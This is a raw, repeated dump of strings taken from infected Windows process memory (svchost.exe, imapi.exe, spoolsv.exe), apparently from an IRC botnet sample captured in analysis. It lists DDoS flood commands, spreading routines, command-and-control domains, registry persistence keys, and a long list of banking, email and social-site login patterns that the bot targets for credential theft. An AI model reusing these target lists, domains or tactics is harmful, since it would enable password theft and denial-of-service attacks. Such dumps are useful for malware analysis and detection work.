flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%WinDir%\System32\svchost.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\svchost.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exesvchost.exe_1148_rwx_007F0000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\svchost.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\svchost.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exesvchost.exe_1192_rwx_00CF0000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\svchost.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\svchost.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exeimapi.exe_1264_rwx_00A70000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\imapi.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\imapi.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exespoolsv.exe_1440_rwx_00F50000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" 